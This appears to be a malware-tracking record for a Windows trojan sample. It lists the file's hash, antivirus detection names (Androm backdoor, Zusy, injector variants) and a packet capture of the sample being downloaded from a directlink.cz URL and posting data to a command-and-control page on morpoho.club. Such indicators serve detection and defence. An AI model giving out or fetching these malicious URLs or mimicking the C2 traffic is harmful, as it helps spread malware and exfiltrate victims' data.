Date added: May 15, 2017 2:40 am
Added by: admin
File size: 63 KB
SHA256: 3977145723a78e6c2f70a2c5b05cc21e0f3a7552f66ae8223ed67c614819e6a4
File name: 8848275c18.exe
Detection ratio: 42 / 60
Analysis date: 2017-05-14 22:16:11 UTC
Ad-Aware Gen:Variant.Zusy.236832 20170514
AegisLab Backdoor.W32.Androm!c 20170514
Antiy-AVL Trojan[Backdoor]/Win32.Androm 20170514
Arcabit Trojan.Zusy.D39D20 20170514
Avast Win32:Malware-gen 20170514
AVG Inject3.CMBE 20170514
Avira (no cloud) TR/Dropper.Gen 20170514
AVware Trojan.Win32.Generic!BT 20170514
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9986 20170503
BitDefender Gen:Variant.Zusy.236832 20170514
Bkav HW32.Packed.6A39 20170513
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20170130
DrWeb Trojan.Inject2.53489 20170514
Emsisoft Gen:Variant.Zusy.236832 (B) 20170514
Endgame malicious (high confidence) 20170503
ESET-NOD32 a variant of Win32/Injector.DOEX 20170514
F-Secure Gen:Variant.Zusy.236832 20170514
Fortinet W32/Androm.DOEX!tr.bdr
2017-05-14 21:39:18.826218 IP 192.168.1.102.58272 > 104.27.190.41.80: Flags [P.], seq 0:410, ack 1, win 256, length 410: HTTP: GET /download/8848275c18.exe HTTP/1.1
GET /download/8848275c18.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: directlink.cz
Connection: Keep-Alive
2017-05-14 21:39:30.280665 IP 192.168.1.102.58274 > 155.133.64.224.80: Flags [P.], seq 0:300, ack 1, win 256, length 300: HTTP: POST /vad/order.php?page=106 HTTP/1.1
POST /vad/order.php?page=106 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: morpoho.club
Content-Length: 964
Cache-Control: no-cache
2017-05-14 21:39:30.553845 IP 192.168.1.102.58274 > 155.133.64.224.80: Flags [P.], seq 300:1264, ack 1, win 256, length 964: HTTP
2017-05-14 21:39:30.912164 IP 192.168.1.102.58274 > 155.133.64.224.80: Flags [.], ack 287, win 255, length 0